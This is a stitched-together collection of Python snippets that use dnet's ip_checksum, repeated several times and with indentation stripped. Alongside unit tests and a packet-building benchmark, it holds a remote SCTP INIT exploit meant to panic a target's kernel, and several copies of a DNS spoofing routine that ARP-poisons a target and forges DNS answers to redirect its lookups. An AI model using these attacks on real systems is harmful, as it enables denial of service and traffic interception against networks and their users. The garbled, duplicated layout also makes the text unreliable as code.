def Send(self):
ip = dnet.ip()
for pkt in self.packets:
data = str(pkt)
data = dnet.ip_checksum(data)
ip.send(data)
time.sleep(0.10)
def run(self):
for i in xrange(1, SEQ_DELTA+1):
self.tcp.seq += i
for j in xrange(MAX_HOPS):
self.ip.id = j
self.ip.ttl = j
buf = dnet.ip_checksum(str(self.ip))
self.sock.send(buf)
time.sleep(0.001)
def test_ip_misc(self):
n = '\x01\x02\x03\x04'
a = '1.2.3.4'
self.failUnless(dnet.ip_ntoa(n) == a)
self.failUnless(dnet.ip_aton(a) == n)
dst = '\x05\x06\x07\x08'
hdr = dnet.ip_pack_hdr(0, dnet.IP_HDR_LEN, 666, 0, 255,
dnet.IP_PROTO_UDP, n, dst)
assert hdr == 'E\x00\x00\x14\x02\x9a\x00\x00\xff\x11\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08'
hdr = dnet.ip_checksum(hdr)
assert hdr == 'E\x00\x00\x14\x02\x9a\x00\x00\xff\x11\xa9+\x01\x02\x03\x04\x05\x06\x07\x08'
def test_ip_misc(self):
n = '\x01\x02\x03\x04'
a = '1.2.3.4'
self.failUnless(dnet.ip_ntoa(n) == a)
self.failUnless(dnet.ip_aton(a) == n)
dst = '\x05\x06\x07\x08'
hdr = dnet.ip_pack_hdr(0, dnet.IP_HDR_LEN, 666, 0, 255,
dnet.IP_PROTO_UDP, n, dst)
assert hdr == 'E\x00\x00\x14\x02\x9a\x00\x00\xff\x11\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08'
hdr = dnet.ip_checksum(hdr)
assert hdr == 'E\x00\x00\x14\x02\x9a\x00\x00\xff\x11\xa9+\x01\x02\x03\x04\x05\x06\x07\x08'
def main():
if len(sys.argv) != 3:
usage()
host = sys.argv[1]
port = int(sys.argv[2])
try:
sock = dnet.ip()
intf = dnet.intf()
except OSError:
err('requires root privileges for raw socket access')
dst_addr = socket.gethostbyname(host)
interface = intf.get_dst(dnet.addr(dst_addr))
src_addr = interface['addr'].ip
msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))
invalid = ''
invalid += '\x20\x10\x11\x73'
invalid += '\x00\x00\xf4\x00'
invalid += '\x00\x05'
invalid += '\x00\x05'
invalid += '\x20\x10\x11\x73'
for i in xrange(20):
invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'
init = dpkt.sctp.Chunk()
init.type = dpkt.sctp.INIT
init.data = invalid
init.len = len(init)
sctp = dpkt.sctp.SCTP()
sctp.sport = 0x1173
sctp.dport = port
sctp.data = [init]
ip = dpkt.ip.IP()
ip.src = src_addr
ip.dst = dnet.ip_aton(dst_addr)
ip.p = dpkt.ip.IP_PROTO_SCTP
ip.data = sctp
ip.len = len(ip)
print ` ip `
pkt = dnet.ip_checksum(str(ip))
sock.send(pkt)
msg('kernel should have panicked on remote host %s' % (dst_addr))
def main():
if len(sys.argv) != 3:
usage()
host = sys.argv[1]
port = int(sys.argv[2])
try:
sock = dnet.ip()
intf = dnet.intf()
except OSError:
err('requires root privileges for raw socket access')
dst_addr = socket.gethostbyname(host)
interface = intf.get_dst(dnet.addr(dst_addr))
src_addr = interface['addr'].ip
msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))
invalid = ''
invalid += '\x20\x10\x11\x73'
invalid += '\x00\x00\xf4\x00'
invalid += '\x00\x05'
invalid += '\x00\x05'
invalid += '\x20\x10\x11\x73'
for i in xrange(20):
invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'
init = dpkt.sctp.Chunk()
init.type = dpkt.sctp.INIT
init.data = invalid
init.len = len(init)
sctp = dpkt.sctp.SCTP()
sctp.sport = 0x1173
sctp.dport = port
sctp.data = [ init ]
ip = dpkt.ip.IP()
ip.src = src_addr
ip.dst = dnet.ip_aton(dst_addr)
ip.p = dpkt.ip.IP_PROTO_SCTP
ip.data = sctp
ip.len = len(ip)
print `ip`
pkt = dnet.ip_checksum(str(ip))
sock.send(pkt)
msg('kernel should have panicked on remote host %s' % (dst_addr))
def dns_spoof(dev,
source_mac,
source,
target=None,
host=None,
redirection=None):
redirection = gethostbyname(redirection)
sock = dnet.ip()
pcap_filter = 'udp dst port 53'
if target:
pcap_filter += ' and src %s' % target
print('[+] Start poisoning on ' + G + dev + W + ' between ' + G + source +
W + ' and ' + R + target + W)
# need to create a daemon that continually poison our target
thread = Thread(target=poison, args=(
dev,
source_mac,
source,
target,
2,
))
thread.daemon = True
thread.start()
pc = pcap.pcap(dev)
pc.setfilter(pcap_filter)
print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W +
' for ' + R + target + W)
try:
for ts, pkt in pc:
eth = dpkt.ethernet.Ethernet(pkt)
ip = eth.data
udp = ip.data
dns = dpkt.dns.DNS(udp.data)
# validate query
if dns.qr != dpkt.dns.DNS_Q:
continue
if dns.opcode != dpkt.dns.DNS_QUERY:
continue
if len(dns.qd) != 1:
continue
if len(dns.an) != 0:
continue
if len(dns.ns) != 0:
continue
if dns.qd[0].cls != dpkt.dns.DNS_IN:
continue
if dns.qd[0].type != dpkt.dns.DNS_A:
continue
# spoof for our target name
if dns.qd[0].name != host:
continue
# dns query->response
dns.op = dpkt.dns.DNS_RA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
dns.qr = dpkt.dns.DNS_R
# construct fake answer
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = host
arr.ip = dnet.addr(redirection).ip
# arr.ip = '\x4D\xEE\xB8\x96'
dns.an.append(arr)
udp.sport, udp.dport = udp.dport, udp.sport
ip.src, ip.dst = ip.dst, ip.src
udp.data = dns
udp.ulen = len(udp)
ip.len = len(ip)
print(inet_ntoa(ip.src))
buf = dnet.ip_checksum(str(ip))
sock.send(buf)
except KeyboardInterrupt:
print('[+] DNS spoofing interrupted\n\r')
utils.set_ip_forward(0)
def dns_spoof(self, host=None, redirection=None):
"""
Redirect all incoming request for 'host' to 'redirection'
"""
pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
redirection = gethostbyname(redirection)
sock = dnet.ip()
print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
self.gateway + W + ' and ' + R +
(','.join(self.target) if isinstance(self.target, list
) else self.target) + W +
'\n')
# need to create a daemon that continually poison our target
poison_thread = Thread(target=self.poison, args=(2, ))
poison_thread.daemon = True
poison_thread.start()
packets = pcap.pcap(self.dev)
packets.setfilter(pcap_filter)
print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection +
W + ' for ' + R +
(','.join(self.target) if isinstance(self.target, list
) else self.target) + W)
try:
for _, pkt in packets:
eth = dpkt.ethernet.Ethernet(pkt)
ip_packet = eth.data
udp = ip_packet.data
dns = dpkt.dns.DNS(udp.data)
# validate query
if dns.qr != dpkt.dns.DNS_Q:
continue
if dns.opcode != dpkt.dns.DNS_QUERY:
continue
if len(dns.qd) != 1:
continue
if len(dns.an) != 0:
continue
if len(dns.ns) != 0:
continue
if dns.qd[0].cls != dpkt.dns.DNS_IN:
continue
if dns.qd[0].type != dpkt.dns.DNS_A:
continue
# spoof for our target name
if dns.qd[0].name != host:
continue
# dns query->response
dns.op = dpkt.dns.DNS_RA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
dns.qr = dpkt.dns.DNS_R
# construct fake answer
arr = dpkt.dns.DNS.RR()
arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
arr.ip = dnet.addr(redirection).ip
dns.an.append(arr)
udp.sport, udp.dport = udp.dport, udp.sport
ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
udp.data, udp.ulen = dns, len(udp)
ip_packet.len = len(ip_packet)
print(inet_ntoa(ip_packet.src))
buf = dnet.ip_checksum(str(ip_packet))
sock.send(buf)
except KeyboardInterrupt:
print('[+] DNS spoofing interrupted\n\r')
self.restore(2)
utils.set_ip_forward(0)
def dns_spoof(dev, source_mac, source, target = None, host = None, redirection = None): redirection = gethostbyname(redirection) sock = dnet.ip() filter = 'udp dst port 53' if target: filter += ' and src %s' % target print '[+] Start poisoning on ' + G + dev + W + ' between ' + G + source + W + ' and ' + R + target + W # need to create a daemon that continually poison our target thread = Thread(target = poison, args = (dev, source_mac, source, target, 2, )) thread.daemon = True thread.start() pc = pcap.pcap(dev) pc.setfilter(filter) print '[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + target + W try: for ts, pkt in pc: eth = dpkt.ethernet.Ethernet(pkt) ip = eth.data udp = ip.data dns = dpkt.dns.DNS(udp.data) # validate query if dns.qr != dpkt.dns.DNS_Q: continue if dns.opcode != dpkt.dns.DNS_QUERY: continue if len(dns.qd) != 1: continue if len(dns.an) != 0: continue if len(dns.ns) != 0: continue if dns.qd[0].cls != dpkt.dns.DNS_IN: continue if dns.qd[0].type != dpkt.dns.DNS_A: continue # spoof for our target name if dns.qd[0].name != host: continue # dns query->response dns.op = dpkt.dns.DNS_RA dns.rcode = dpkt.dns.DNS_RCODE_NOERR dns.qr = dpkt.dns.DNS_R # construct fake answer arr = dpkt.dns.DNS.RR() arr.cls = dpkt.dns.DNS_IN arr.type = dpkt.dns.DNS_A arr.name = host arr.ip = dnet.addr(redirection).ip # arr.ip = '\x4D\xEE\xB8\x96' dns.an.append(arr) udp.sport, udp.dport = udp.dport, udp.sport ip.src, ip.dst = ip.dst, ip.src udp.data = dns udp.ulen = len(udp) ip.len = len(ip) print inet_ntoa(ip.src) buf = dnet.ip_checksum(str(ip)) try: sock.send(buf) except: pass except KeyboardInterrupt: print '[+] DNS spoofing interrupted\n\r' set_ip_forward(0)
def compare_create(cnt):
"""
dpkt: 14915.2445937 pps
dpkt (manual): 15494.3632903 pps
impacket: 3929.30572776 pps
openbsd.packet: 1503.7928579 pps
scapy: 348.449269721 pps
xstruct: 88314.8953732 pps
"""
src = dnet.addr('1.2.3.4').ip
dst = dnet.addr('5.6.7.8').ip
data = 'hello world'
start = time.time()
for i in range(cnt):
dnet.ip_checksum(
str(
dpkt.ip.IP(src=src,
dst=dst,
p=dnet.IP_PROTO_UDP,
len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data),
data=dpkt.udp.UDP(sport=111,
dport=222,
ulen=dnet.UDP_HDR_LEN + len(data),
data=data))))
print('dpkt:', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
dnet.ip_checksum(
str(
dpkt.ip.IP(src=src,
dst=dst,
p=dnet.IP_PROTO_UDP,
len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN +
len(data))) +
str(
dpkt.udp.UDP(
sport=111, dport=222, ulen=dnet.UDP_HDR_LEN + len(data))) +
data)
print('dpkt (manual):', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
ip = ImpactPacket.IP()
ip.set_ip_src('1.2.3.4')
ip.set_ip_dst('5.6.7.8')
udp = ImpactPacket.UDP()
udp.set_uh_sport(111)
udp.set_uh_dport(222)
udp.contains(ImpactPacket.Data(data))
ip.contains(udp)
ip.get_packet()
print('impacket:', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
p = packet.createPacket(packet.IP, packet.UDP)
p['ip'].src = '1.2.3.4'
p['ip'].dst = '5.6.7.8'
p['udp'].sport = 111
p['udp'].dport = 22
p['udp'].payload = data
p.finalise()
p.getRaw()
print('openbsd.packet:', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
ip = scapy.IP(src='1.2.3.4', dst='5.6.7.8') / \
scapy.UDP(sport=111, dport=222) / data
ip.build()
print('scapy:', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
udp = xudp()
udp.sport = 111
udp.dport = 222
udp.ulen = dnet.UDP_HDR_LEN + len(data)
ip = xip()
ip.src = src
ip.dst = dst
ip.p = dnet.IP_PROTO_UDP
ip.len = dnet.IP_HDR_LEN + udp.ulen
dnet.ip_checksum(str(ip) + str(udp) + data)
print('xstruct:', cnt / (time.time() - start), 'pps')
def compare_create(cnt):
"""
dpkt: 14915.2445937 pps
dpkt (manual): 15494.3632903 pps
impacket: 3929.30572776 pps
openbsd.packet: 1503.7928579 pps
scapy: 348.449269721 pps
xstruct: 88314.8953732 pps
"""
src = dnet.addr('1.2.3.4').ip
dst = dnet.addr('5.6.7.8').ip
data = 'hello world'
start = time.time()
for i in range(cnt):
dnet.ip_checksum(
str(dpkt.ip.IP(src=src, dst=dst, p=dnet.IP_PROTO_UDP,
len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data),
data=dpkt.udp.UDP(sport=111, dport=222,
ulen=dnet.UDP_HDR_LEN + len(data),
data=data))))
print('dpkt:', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
dnet.ip_checksum(str(dpkt.ip.IP(src=src, dst=dst, p=dnet.IP_PROTO_UDP,
len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN +
len(data))) +
str(dpkt.udp.UDP(sport=111, dport=222,
ulen=dnet.UDP_HDR_LEN + len(data))) +
data)
print('dpkt (manual):', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
ip = ImpactPacket.IP()
ip.set_ip_src('1.2.3.4')
ip.set_ip_dst('5.6.7.8')
udp = ImpactPacket.UDP()
udp.set_uh_sport(111)
udp.set_uh_dport(222)
udp.contains(ImpactPacket.Data(data))
ip.contains(udp)
ip.get_packet()
print('impacket:', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
p = packet.createPacket(packet.IP, packet.UDP)
p['ip'].src = '1.2.3.4'
p['ip'].dst = '5.6.7.8'
p['udp'].sport = 111
p['udp'].dport = 22
p['udp'].payload = data
p.finalise()
p.getRaw()
print('openbsd.packet:', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
ip = scapy.IP(src='1.2.3.4', dst='5.6.7.8') / \
scapy.UDP(sport=111, dport=222) / data
ip.build()
print('scapy:', cnt / (time.time() - start), 'pps')
start = time.time()
for i in range(cnt):
udp = xudp()
udp.sport = 111
udp.dport = 222
udp.ulen = dnet.UDP_HDR_LEN + len(data)
ip = xip()
ip.src = src
ip.dst = dst
ip.p = dnet.IP_PROTO_UDP
ip.len = dnet.IP_HDR_LEN + udp.ulen
dnet.ip_checksum(str(ip) + str(udp) + data)
print('xstruct:', cnt / (time.time() - start), 'pps')
def dns_spoof(self, host=None, redirection=None):
"""
Redirect all incoming request for 'host' to 'redirection'
"""
pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
redirection = gethostbyname(redirection)
sock = dnet.ip()
print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W
+ ' and ' + R
+ (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
# need to create a daemon that continually poison our target
poison_thread = Thread(target=self.poison, args=(2, ))
poison_thread.daemon = True
poison_thread.start()
packets = pcap.pcap(self.dev)
packets.setfilter(pcap_filter)
print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R
+ (','.join(self.target) if isinstance(self.target, list) else self.target) + W)
try:
for _, pkt in packets:
eth = dpkt.ethernet.Ethernet(pkt)
ip_packet = eth.data
udp = ip_packet.data
dns = dpkt.dns.DNS(udp.data)
# validate query
if dns.qr != dpkt.dns.DNS_Q:
continue
if dns.opcode != dpkt.dns.DNS_QUERY:
continue
if len(dns.qd) != 1:
continue
if len(dns.an) != 0:
continue
if len(dns.ns) != 0:
continue
if dns.qd[0].cls != dpkt.dns.DNS_IN:
continue
if dns.qd[0].type != dpkt.dns.DNS_A:
continue
# spoof for our target name
if dns.qd[0].name != host:
continue
# dns query->response
dns.op = dpkt.dns.DNS_RA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
dns.qr = dpkt.dns.DNS_R
# construct fake answer
arr = dpkt.dns.DNS.RR()
arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
arr.ip = dnet.addr(redirection).ip
dns.an.append(arr)
udp.sport, udp.dport = udp.dport, udp.sport
ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
udp.data, udp.ulen = dns, len(udp)
ip_packet.len = len(ip_packet)
print(inet_ntoa(ip_packet.src))
buf = dnet.ip_checksum(str(ip_packet))
sock.send(buf)
except KeyboardInterrupt:
print('[+] DNS spoofing interrupted\n\r')
self.restore(2)
utils.set_ip_forward(0)
